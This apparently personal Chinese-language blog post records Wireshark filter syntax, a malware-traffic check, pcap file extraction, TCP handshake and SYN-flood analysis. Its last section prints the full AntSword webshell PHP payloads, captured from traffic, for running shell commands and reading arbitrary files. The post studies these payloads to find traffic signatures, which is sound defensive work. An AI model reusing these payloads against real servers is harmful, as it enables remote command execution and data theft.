<!DOCTYPE html>
<html lang="zh-cmn-Hans">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="纯净水@流云-自留地">
    <link rel="shortcut icon" href="http://some.url/to/favicon.ico">
    <title>Adagio</title>
    
        
            <link href="https://cdn.bootcss.com/twitter-bootstrap/4.3.1/css/bootstrap.min.css" rel="stylesheet">
            <link href="https://cdn.bootcss.com/academicons/1.8.6/css/academicons.min.css" rel="stylesheet">
            <link href="https://cdn.bootcss.com/font-awesome/5.9.0/css/all.min.css" rel="stylesheet">
            <link href="https://cdn.bootcss.com/animate.css/3.7.2/animate.min.css" rel="stylesheet">
        
    
    <link rel="stylesheet" href="/css/adagio.css">
<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>
<body>
    <div class="container-fluid">
    <nav class="nav">
        <div class="collapse navbar-collapse" id="navbar-sm">
            
            
            <div class="navbar-nav">
                <a href="https://hexo.io" class="nav-item nav-link">Hexo</a>
            </div>
            
            <div class="navbar-nav">
                <a href="http://www.hanlindong.com" class="nav-item nav-link">Adagio's author</a>
            </div>
            
        </div>
    </nav>
</div>

<div class="d-flex d-md-none" style="width: 100%; background-color: #e9ecef">
    
    <div class="nav">
        <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbar-sm"
            aria-expanded="false" aria-label="Toggle Navigation">
            <i class="fas fa-bars fa-lg"></i>
        </button>
    </div>
    
    <nav class="navbar ml-auto">
        <a class="navbar-brand" href="/">
            
            <img class="logo" src="https://via.placeholder.com/100x50.png?text=logo" />
            
        </a>
    </nav>
</div>


<div class="container d-none d-md-block my-navbar">
    <nav class="navbar navbar-expand-sm navbar-light bg-transparent">
        <a class="navbar-brand " href="/">
            
            <img class="logo" src="https://via.placeholder.com/100x50.png?text=logo" />
            
        </a>
        
        <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarNav"
            aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation">
            <span class="navbar-toggler-icon"></span>
        </button>
        <div class="collapse navbar-collapse" id="navbarNav">
            <ul class="navbar-nav">
                
                <li class="nav-item pl-2 pr-2 ">
                    <a class="nav-link" href="https://hexo.io">Hexo</a>
                </li>
                
                <li class="nav-item pl-2 pr-2 ">
                    <a class="nav-link" href="http://www.hanlindong.com">Adagio's author</a>
                </li>
                
            </ul>
        </div>
        
    </nav>
</div>




    <div class="jumbotron jumbotron-fluid">
    <div class="container">
        
        <h1 class="mt-4 article-title page-title"></h1>
        
        <p class="lead text-gray mt-3">By Anonymous; Published on 2019-06-10</p>
        
        <div class="tags">
            <ul class="tag-list">
                
            </ul>
        </div>
        
    </div>
</div>
    <div class="container">
        <div class="row">
            <div class="col-md-9 pt-2">
                <div class="row">
                    <div class="col-12">
                        <main>
                            <article class="article-text page-content"><p>wireshark 使用记录 （-）<br>[TOC]</p>
<h1 id="恶意流量检查"><a href="#恶意流量检查" class="headerlink" title="恶意流量检查"></a>恶意流量检查</h1><p>在一台服务器上发现有恶意木马，对该设备进行wireshark 抓包分析，很久没用过wireshark了，记录回顾下。</p>
<h2 id="wireshark-流量分析"><a href="#wireshark-流量分析" class="headerlink" title="wireshark 流量分析"></a>wireshark 流量分析</h2><h3 id="过滤协议"><a href="#过滤协议" class="headerlink" title="过滤协议"></a>过滤协议</h3><p> ctrl+F 或者 http contains”xxx” 来过滤协议</p>
<h3 id="过滤IP"><a href="#过滤IP" class="headerlink" title="过滤IP"></a>过滤IP</h3><pre><code>IP源地址：ip.src ==192.168.1.1
IP目的地址：ip.dst== 192.168.1.1
IP地址（包括源和目的）：ip.addr== 192.168.1.1
</code></pre><h3 id="过滤端口"><a href="#过滤端口" class="headerlink" title="过滤端口"></a>过滤端口</h3><pre><code>TCP端口：tcp.port==80
TCP目的端口：tcp.dstport == 80
TCP源端口：tcp.srcport == 80
UDP端口：udp.port eq 15000
TCP 1-80之间的端口：tcp.port &gt;= 1 and tcp.port &lt;= 80
</code></pre><h3 id="过滤协议-1"><a href="#过滤协议-1" class="headerlink" title="过滤协议"></a>过滤协议</h3><pre><code>http、tcp、udp、arp、icmp、http、smtp、ftp、dns 等
</code></pre><h3 id="过滤包长度"><a href="#过滤包长度" class="headerlink" title="过滤包长度"></a>过滤包长度</h3><pre><code>整个UDP数据包：udp.length==20
TCP数据包中的IP数据包：tcp.len&gt;=20
整个IP数据包：ip.len==20
整个数据包：frame.len==20
</code></pre><h3 id="HTTP模式过滤"><a href="#HTTP模式过滤" class="headerlink" title="HTTP模式过滤"></a>HTTP模式过滤</h3><pre><code>请求方法为GET：http.request.method==“GET”
请求方法为POST：http.request.method==“POST”
指定URI：http.request.uri==“/img/logo-edu.gif”
请求或相应中包含特定内容：http contains “FLAG”
</code></pre><h2 id="实际分析"><a href="#实际分析" class="headerlink" title="实际分析"></a>实际分析</h2><h3 id="病毒端口分析"><a href="#病毒端口分析" class="headerlink" title="病毒端口分析"></a>病毒端口分析</h3><p>因为在服务器上发现的病毒是在tina文件夹下，tina程序执行 tina_daemon.exe,监听端口是2525，在发现是无链接，所以在拿到数据包的时候首先过滤2525 端口<br><img src="/2019/06/10/工具使用/wireshark使用记录/15604724400866.jpg" alt="-w973"><br>经检测 无数据<br><img src="/2019/06/10/工具使用/wireshark使用记录/15604725384626.jpg" alt="-w413"></p>
<h3 id="ip分析"><a href="#ip分析" class="headerlink" title="ip分析"></a>ip分析</h3><p>提取下数据包中包含的ip地址进行分析下<br><img src="/2019/06/10/工具使用/wireshark使用记录/15604776123512.jpg" alt="-w1417"></p>
<p><img src="/2019/06/10/工具使用/wireshark使用记录/15604847479194.jpg" alt="-w698"></p>
<p>外网ip</p>
<pre><code>42.81.104.4 天津电信 无信息 美图
49.7.50.36 北京市北京市 电信 无信息 360
52.188.72.233 美国 微软
59.49.81.218 山西省太原市 电信 动态ip windows 更新
101.227.27.36 上海市上海市 电信 360
221.230.147.106 江苏泰州 电信 微软
</code></pre><p>内网ip：</p>
<h4 id="探测下进行ping-探测的设备"><a href="#探测下进行ping-探测的设备" class="headerlink" title="探测下进行ping 探测的设备"></a>探测下进行ping 探测的设备</h4><ul>
<li><p>ping 探测失败的信息<br><img src="/2019/06/10/工具使用/wireshark使用记录/15604747032178.jpg" alt="-w923"><br>89.0.0.241 是DNS服务器</p>
</li>
<li><p>DNS协议<br><img src="/2019/06/10/工具使用/wireshark使用记录/15604751748952.jpg" alt="-w1176"><br>解析到360天擎 服务端</p>
</li>
</ul>
<p>除此之外还解析请求了两个 内网，但未解析成功<br>分别是<br>10.185.49.42<br>172.17.136.21</p>
<ul>
<li>分析所有连接到ip<br>结合威胁情报 检测所有的ip，未发现敏感连接</li>
</ul>
<h3 id="病毒分析"><a href="#病毒分析" class="headerlink" title="病毒分析"></a>病毒分析</h3><p>回过头来看下木马程序</p>
<p><img src="/2019/06/10/工具使用/wireshark使用记录/15604729787421.jpg" alt="-w693"></p>
<p><img src="/2019/06/10/工具使用/wireshark使用记录/15604730171667.jpg" alt="-w1138"></p>
<p>根据这个信息google了一下<br><a href="https://talhatariq.wordpress.com/2006/04/14/the-open-source-psexec/" target="_blank" rel="noopener">RemCom</a></p>
<h4 id="木马工具行为分析"><a href="#木马工具行为分析" class="headerlink" title="木马工具行为分析"></a>木马工具行为分析</h4><p>该木马主要是一个开源的psexec 远程管理工具<br>工具的说明如下：</p>
<pre><code>RemCom是开源的:。
您可以根据需要在计算机上运行任意数量的远程命令
您可以直接执行内部命令（net，netsh，ipconfig）：RemCom \\ foo-bar-system net start snmp
您可以在没有任何telnet服务器的情况下与远程计算机建立轻型“telnet”连接：RemCom.exe \\ foo-bar-system cmd
您还可以复制远程计算机上的任何文件并接收其输出。
RemCom在远程计算机上创建一个小的（&lt;1 KB）服务（它在运行时从自身中提取它）。
所有通信都通过命名管道和RPC完成。
应用程序在成功断开连接时删除了连接和服务的痕迹（整洁吧？
</code></pre><p>它允许在远程Windows系统上执行进程，复制文件，处理输出并将其流回。允许直接使用完整的交互式控制台执行远程shell命令</p>
<p>分析完发现这个是一个正常的数据包，笔记写得没什么意思，又不想去逆向分析,就找找其他wireshark分析的案列看看</p>
<h2 id="数据分析案例"><a href="#数据分析案例" class="headerlink" title="数据分析案例"></a>数据分析案例</h2><p>直接搜索字符串，然后跟踪数据流如下<br><img src="/2019/06/10/工具使用/wireshark使用记录/15604975574265.jpg" alt="-w584"></p>
<p>想走捷径，在这个基础上尝试利用ftp的被动模式 PSAV 直接连接，结果却发现密码不正确，认证失败，这就很尴尬了，只有继续老老实实的分析数据包。<br>查看数据包，在数据包中直接导出文件：<br>我这里直接使用的foremost导出</p>
<pre><code>foremost -v -i name.pcap
</code></pre><p><img src="/2019/06/10/工具使用/wireshark使用记录/15606752899123.jpg" alt="-w617">导出了一个压缩包和key.log；<br><img src="/2019/06/10/工具使用/wireshark使用记录/15606753433909.jpg" alt="-w733"></p>
<p>看一下key.log<br><img src="/2019/06/10/工具使用/wireshark使用记录/15606824487576.jpg" alt="-w644"><br>记录的是Session Key TLS密钥（借用firfox或chrome配置记录，即可记录该信息）</p>
<p><img src="/2019/06/10/工具使用/wireshark使用记录/15606845604745.jpg" alt="-w914"><br>导出来 看下频谱图 跳下采样率，解压</p>
<h2 id="wireshark-tcp三次握手"><a href="#wireshark-tcp三次握手" class="headerlink" title="wireshark tcp三次握手"></a>wireshark tcp三次握手</h2><p>众所周知，tcp三次握手传输过程</p>
<pre><code>第一次   client --------&gt; server     syn
</code></pre><p>客户端发送syn包（syn=j）到服务器，并进入到syn_sent状态，等待服务端确认<br><img src="/2019/06/10/工具使用/wireshark使用记录/15606653847491.jpg" alt="-w1406"><br><img src="/2019/06/10/工具使用/wireshark使用记录/15606654495869.jpg" alt="-w1334"></p>
<pre><code>第二次   server --------&gt; client     syn + ack
</code></pre><p>务器收到syn包，必须确认客户的SYN(ack=j+1)，同时自己也发送一个SYN包(syn=k)，即SYN+ACK包，此时服务器进入SYN_RECV状态;<br><img src="/2019/06/10/工具使用/wireshark使用记录/15606654835190.jpg" alt="-w1356"></p>
<pre><code>第三次   client --------&gt; server     ack
</code></pre><p>第三次握手:客户端收到服务器的SYN+ACK包，向服务器发送确认包ACK(ack=k+1)，此包发送完毕，客户端和服务器进入ESTABLISHED(TCP连接成功)状态，完成三次握手<br><img src="/2019/06/10/工具使用/wireshark使用记录/15606655134327.jpg" alt="-w1290"></p>
<h2 id="wireshark-分析攻击现象"><a href="#wireshark-分析攻击现象" class="headerlink" title="wireshark 分析攻击现象"></a>wireshark 分析攻击现象</h2><h3 id="DDOS"><a href="#DDOS" class="headerlink" title="DDOS"></a>DDOS</h3><p>在进行DDOS攻击时，wireshark从数据包中能明显看到该现象</p>
<h4 id="SYN-Flood"><a href="#SYN-Flood" class="headerlink" title="SYN Flood"></a>SYN Flood</h4><ul>
<li>flag 常见标识：<br>在TCP层，有个FLAGS字段，这个字段有以下几个标识：SYN, FIN, ACK, PSH, RST, URG.其中，对于我们日常的分析有用的就是前面的五个字段。<br>它们的含义是：<br>SYN表示建立连接，<br>FIN表示关闭连接，<br>ACK表示响应，<br>PSH表示有 DATA数据传输，<br>RST表示连接重置。<br>其中，ACK是可能与SYN，FIN等同时使用的，比如SYN和ACK可能同时为1，它表示的就是建立连接之后的响应，<br>如果只是单个的一个SYN，它表示的只是建立连接。<br>TCP的几次握手就是通过这样的ACK表现出来的。<br>但SYN与FIN是不会同时为1的，因为前者表示的是建立连接，而后者表示的是断开连接。<br>RST一般是在FIN之后才会出现为1的情况，表示的是连接重置。<br>一般地，当出现FIN包或RST包时，我们便认为客户端与服务器端断开了连接；而当出现SYN和SYN＋ACK包时，我们认为客户端与服务器建立了一个连接。<br>PSH为1的情况，一般只出现在 DATA内容不为0的包中，也就是说PSH为1表示的是有真正的TCP数据包内容被传递。<br>TCP的连接建立和连接关闭，都是通过请求－响应的模式完成的。、</li>
</ul>
<p>这里面案例比较有意思的一点：<br>使用TTL分析发现攻击者的蛛丝马迹，当使用随机源进行DDoS攻击时，虽然使用了伪造源地址进行攻击，但攻击者无法伪造攻击主机与目标主机之间的位置关系。有时候通过观察数据包的TTL值变化，也能够获得攻击者的蛛丝马迹，为攻击防御提供辅助支持。下图所示的这个攻击程序并没有修改攻击数据包的TTL值，所有的攻击数据包使用相同的TTL值。这个攻击数据包是由局域网内的一个windows计算机发出的。<br><img src="/2019/06/10/工具使用/wireshark使用记录/15606859908642.jpg" alt="-w590"></p>
<h4 id="UDP-FLOOD"><a href="#UDP-FLOOD" class="headerlink" title="UDP FLOOD"></a>UDP FLOOD</h4><h4 id="ICMP-FLOOD"><a href="#ICMP-FLOOD" class="headerlink" title="ICMP FLOOD"></a>ICMP FLOOD</h4><h3 id="wireshark-记录antsword"><a href="#wireshark-记录antsword" class="headerlink" title="wireshark 记录antsword"></a>wireshark 记录antsword</h3><p>起因是看了下<a href="https://bbs.ichunqiu.com/article-1608-1.html" target="_blank" rel="noopener">记一次wireshark分析中国菜刀http请求</a>想着我一般用蚁剑，于是看看AntSword的利用特征，搭建环境抓包这部分按下不表，直入正题</p>
<p>不知道为啥 同样的木马+antsword在osx 本地系统上无法执行，一直在报错，还没细看</p>
<h4 id="虚拟终端时"><a href="#虚拟终端时" class="headerlink" title="虚拟终端时"></a>虚拟终端时</h4><p><img src="/2019/06/10/工具使用/wireshark使用记录/15631138557440.jpg" alt="-w952"><br><img src="/2019/06/10/工具使用/wireshark使用记录/15631139876578.jpg" alt="-w1355"><br>可以明显看到 UA有 antsword的标志<br>其中连接shell 执行语句如下：</p>
<pre><code>0x1291b5bcd176f=L2Jpbi9zaA==&amp;0x39e42e841a89c=Y2QgIi92YXIvd3d
3L2h0bWwiO3B3ZDtlY2hvIFtTXTtwd2Q7ZWNobyBbRV0=&amp;ant=
@ini_set(&quot;display_errors&quot;, &quot;0&quot;);
@set_time_limit(0);
function asenc($out){return $out;};
function asoutput(){
    $output=ob_get_contents();
    ob_end_clean();
    echo &quot;26623&quot;;
    echo @asenc($output);
    echo &quot;e6e71&quot;;
    }
ob_start();
try
    {
        $p=base64_decode($_POST[&quot;0x1291b5bcd176f&quot;]);
        $s=base64_decode($_POST[&quot;0x39e42e841a89c&quot;]);       
        $d=dirname($_SERVER[&quot;SCRIPT_FILENAME&quot;]);
        $c=substr($d,0,1)==&quot;/&quot;?&quot;-c \&quot;{$s}\&quot;&quot;:&quot;/c \&quot;{$s}\&quot;&quot;;    
        $r=&quot;{$p}{$c}&quot;;
        function fe($f)
        {
        $d=explode(&quot;,&quot;,@ini_get(&quot;disable_functions&quot;));
        if(empty($d)){$d=array();}
        else{
            $d=array_map(&#39;trim&#39;,array_map(&#39;strtolower&#39;,$d));
            }
        return(function_exists($f)&amp;&amp;is_callable($f)&amp;&amp;!in_array($f,$d));
        };
        function runcmd($c)
        {
        $ret=0;
        if(fe(&#39;system&#39;)){@system($c,$ret);} 
        elseif(fe(&#39;passthru&#39;))
        {
            @passthru($c,$ret);
        }
        elseif(fe(&#39;shell_exec&#39;)){print(@shell_exec($c));}
        elseif(fe(&#39;exec&#39;)){@exec($c,$o,$ret);print(join(&quot;&quot;,$o));}
        elseif(fe(&#39;popen&#39;))
        {
        $fp=@popen($c,&#39;r&#39;);
        while(!@feof($fp){print(@fgets($fp, 2048));}
        @pclose($fp);
        }
        elseif(fe(&#39;antsystem&#39;)){@antsystem($c);}
        else{$ret = 127;}
        return $ret;
    };
    $ret=@runcmd($r.&quot; 2&gt;&amp;1&quot;);
    print ($ret!=0)?&quot;ret={$ret}&quot;:&quot;&quot;;;
}catch(Exception $e)
{echo &quot;ERROR://&quot;.$e-&gt;getMessage();};asoutput();die();
</code></pre><p>获取当前脚本运行目录-获取绝对路径</p>
<pre><code>dirname($_SERVER[&quot;SCRIPT_FILENAME&quot;]
</code></pre><p>捕获分组获得字符串中的参数</p>
<pre><code>substr($d,0,1)==&quot;/&quot;?&quot;-c \&quot;{$s}\&quot;&quot;:&quot;/c \&quot;{$s}\&quot;&quot;;    
</code></pre><p>执行命令</p>
<pre><code>runcmd($r.&quot; 2&gt;&amp;1&quot;)
</code></pre><h4 id="下载文件"><a href="#下载文件" class="headerlink" title="下载文件"></a>下载文件</h4><pre><code>0x97c1110a314d1=L3Zhci93d3cvaHRtbC9pbmZvLnBocA==&amp;ant=
@ini_set(&quot;display_errors&quot;, &quot;0&quot;);
@set_time_limit(0);
function asenc($out)
{
    return $out;
};
function asoutput()
{    
    $output=ob_get_contents();
    ob_end_clean();
    echo &quot;d6192&quot;;
    echo @asenc($output);
    echo &quot;96e2b&quot;;
}
ob_start();
try
{
    $F=base64_decode(get_magic_quotes_gpc()?stripslashes($_POST[&quot;0x97c1110a314d1&quot;]):
    $_POST[&quot;0x97c1110a314d1&quot;]); 
    $fp=@fopen($F,&quot;r&quot;);
    if(@fgetc($fp))
        {
        @fclose($fp);
        @readfile($F);
        }
    else{
        echo(&quot;ERROR:// Can Not Read&quot;);
        };
}
catch(Exception $e){echo &quot;ERROR://&quot;.$e-&gt;getMessage();};asoutput();die();

</code></pre><p>这里比较有区别的地方，使用了fopen读取文件内容 进行下载</p>
<pre><code> $fp=@fopen($F,&quot;r&quot;);
</code></pre><h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h1><p>[wireshark还原数据文件]<br>(<a href="http://blog.sina.com.cn/s/blog_e8e60bc00102vfd9.html" target="_blank" rel="noopener">http://blog.sina.com.cn/s/blog_e8e60bc00102vfd9.html</a>)<br><a href="https://www.2cto.com/article/201502/377678.html" target="_blank" rel="noopener">破解ssl加密数据包</a><br><a href="https://security.tencent.com/index.php/blog/msg/3" target="_blank" rel="noopener">使用Wireshark分析并发现DDoS攻击</a><br><a href="http://www.360doc.com/content/17/0123/20/33093582_624406842.shtml" target="_blank" rel="noopener">WireShark分析针对路由器的linux木马</a></p>
</article>
                        </main>
                        
                        
                    </div>
                </div>
                <div class="row mt-5 mb-5">
                    <div class="col-12">
                        <div class="row">
    <div class="col">
        <nav aria-label="paginator" class="paginator">
            <ul class="pagination d-none d-md-flex pagination-lg justify-content-center">
                <li class="page-item ">
                    <a class="page-link"
                        href="/2019/07/08/Web渗透/XXE/XXE实例及应用3/"
                        aria-label="Previous">
                        <span aria-hidden="true">&laquo;
                            XXE实例及应用3</span>
                        <span class="sr-only">Previous</span>
                    </a>
                </li>
                <li class="page-item ">
                    <a class="page-link"
                        href="/2019/03/14/区块链/ETH/ETH-1/偷渡漏洞_拒绝服务/"
                        aria-label="Next">
                        <span
                            aria-hidden="true">ETH 漏洞复现
                            &raquo;</span>
                        <span class="sr-only">Next</span>
                    </a>
                </li>
            </ul>
            <ul class="pagination d-md-none justify-content-center">
                <li class="page-item ">
                    <a class="page-link"
                        href="/2019/07/08/Web渗透/XXE/XXE实例及应用3/"
                        aria-label="Previous">
                        <span aria-hidden="true">&laquo;
                            XXE实例及应用3</span>
                        <span class="sr-only">Previous</span>
                    </a>
                </li>
                <li class="page-item ">
                    <a class="page-link"
                        href="/2019/03/14/区块链/ETH/ETH-1/偷渡漏洞_拒绝服务/"
                        aria-label="Next">
                        <span
                            aria-hidden="true">ETH 漏洞复现
                            &raquo;</span>
                        <span class="sr-only">Next</span>
                    </a>
                </li>
            </ul>
        </nav>
    </div>
</div>



                    </div>
                </div>
                <div class="row">
                    <div class="col-12">
                        <div id="vcomment"></div>
                    </div>
                </div>
            </div>
            <div class="col-md-3">
                <div class="container pt-4 page-sidebar">
                    
                    <div class="row">
    <div class="col">
        <h6>APPLAUSE FOR ME</h6>
        <div id="applause-easy"></div>
    </div>
</div>
                    
                    <hr class="row">
                    <div class="row toc-container">
                        <div class="col-12">
                            <h6>NAVIGATION</h6>
                            <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#恶意流量检查"><span class="toc-text">恶意流量检查</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#wireshark-流量分析"><span class="toc-text">wireshark 流量分析</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#过滤协议"><span class="toc-text">过滤协议</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#过滤IP"><span class="toc-text">过滤IP</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#过滤端口"><span class="toc-text">过滤端口</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#过滤协议-1"><span class="toc-text">过滤协议</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#过滤包长度"><span class="toc-text">过滤包长度</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#HTTP模式过滤"><span class="toc-text">HTTP模式过滤</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#实际分析"><span class="toc-text">实际分析</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#病毒端口分析"><span class="toc-text">病毒端口分析</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ip分析"><span class="toc-text">ip分析</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#探测下进行ping-探测的设备"><span class="toc-text">探测下进行ping 探测的设备</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#病毒分析"><span class="toc-text">病毒分析</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#木马工具行为分析"><span class="toc-text">木马工具行为分析</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#数据分析案例"><span class="toc-text">数据分析案例</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#wireshark-tcp三次握手"><span class="toc-text">wireshark tcp三次握手</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#wireshark-分析攻击现象"><span class="toc-text">wireshark 分析攻击现象</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#DDOS"><span class="toc-text">DDOS</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#SYN-Flood"><span class="toc-text">SYN Flood</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#UDP-FLOOD"><span class="toc-text">UDP FLOOD</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#ICMP-FLOOD"><span class="toc-text">ICMP FLOOD</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#wireshark-记录antsword"><span class="toc-text">wireshark 记录antsword</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#虚拟终端时"><span class="toc-text">虚拟终端时</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#下载文件"><span class="toc-text">下载文件</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#参考"><span class="toc-text">参考</span></a></li></ol>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <footer>
    <div class="jumbotron jumbotron-fluid mb-0">
        <div class="container-fluid">
            <div class="col text-center">
                <div class="bottom-social">
                    <div class="row">
    <div class="col text-center">
        <ul class="list-inline">
            
            <li class="list-inline-item">
                
                <a href="https://github.com/xxxxx">
                    <span class="fa-stack fa-2x icon-link">
                        <i class="fas fa-circle fa-stack-2x"></i>
                        <i class="fab fa-github fa-stack-1x fa-inverse"></i>
                    </span>
                </a>
                
            </li>
            
            <li class="list-inline-item">
                
                <a href="https://www.facebook.com/xxxxx">
                    <span class="fa-stack fa-2x icon-link">
                        <i class="fas fa-circle fa-stack-2x"></i>
                        <i class="fab fa-facebook-f fa-stack-1x fa-inverse"></i>
                    </span>
                </a>
                
            </li>
            
            <li class="list-inline-item">
                
                <a href="https://www.pinterest.com/xxxxx">
                    <span class="fa-stack fa-2x icon-link">
                        <i class="fas fa-circle fa-stack-2x"></i>
                        <i class="fab fa-pinterest-p fa-stack-1x fa-inverse"></i>
                    </span>
                </a>
                
            </li>
            
            <li class="list-inline-item">
                
                <a href="https://www.linkedin.com/in/xxxxx">
                    <span class="fa-stack fa-2x icon-link">
                        <i class="fas fa-circle fa-stack-2x"></i>
                        <i class="fab fa-linkedin-in fa-stack-1x fa-inverse"></i>
                    </span>
                </a>
                
            </li>
            
        </ul>
    </div>
</div>

                </div>
                <p class="copyright text-muted">
                    Copyright &copy; 吾善养浩然气
                    <br>
                    Thanks for coming!
                    <br>
                    <a href="https://github.com/Hanlin-Dong/hexo-theme-adagio">Adagio</a> - A <a href="https://hexo.io">Hexo</a> theme made with love by
                    <a href="http://www.hanlindong.com">Hanlin Dong</a>.
                </p>
            </div>
        </div>
    </div>
</footer>

    
    
        <script src="https://cdn.bootcss.com/jquery/3.4.1/jquery.slim.min.js"></script>
        <script src="https://cdn.bootcss.com/twitter-bootstrap/4.3.1/js/bootstrap.bundle.min.js"></script>
        <script src="https://cdn.bootcss.com/font-awesome/5.9.0/js/all.min.js"></script>
         
            <script type="text/x-mathjax-config">
                MathJax.Hub.Config({
                    CommonHTML: { linebreaks: { automatic: true } },
                    "HTML-CSS": { linebreaks: { automatic: true } },
                    SVG: { linebreaks: { automatic: true } }
                });
            </script>
            <script src='https://cdn.bootcss.com/mathjax/2.7.5/MathJax.js?config=TeX-MML-AM_CHTML' async></script>
        
    


<script src="/js/av.min.js"></script>
<script src="/js/valine.min.js"></script>
<script src="/js/applause-easy.js"></script>

<script>
$(document).ready(function() {
    var a = new ApplauseEasy({
        id: 'applause-easy',
        appId: "xxxxxxxxxx",
        appKey: "xxxxxxxxxx",
        img_src: "http://img.hanlindong.com/blog/site/clap.png",
        img_width: "50px",
        img_height: "50px"
    })
})
</script>


<script>
    var _hmt = _hmt || [];
    (function () {
        var hm = document.createElement("script");
        hm.src = "https://hm.baidu.com/hm.js?123456789";
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(hm, s);
    })();
</script>



<script async src="https://www.googletagmanager.com/gtag/js?id=UA-11111111-1"></script>
<script>
    window.dataLayer = window.dataLayer || [];
    function gtag() {
        dataLayer.push(arguments);
    }
    gtag('js', new Date());
    gtag('config', 'UA-11111111-1');
</script>


    
    <script>
    new Valine({
        el: "#vcomment",
        appId: "xxxxxxxxxx",
        appKey: "xxxxxxxxxx",
        notify: false,
        varify: false,
        avatar: 'identicon',
        placeholder: "",
        recordIP: true
    })
</script>
    
</body>
</html>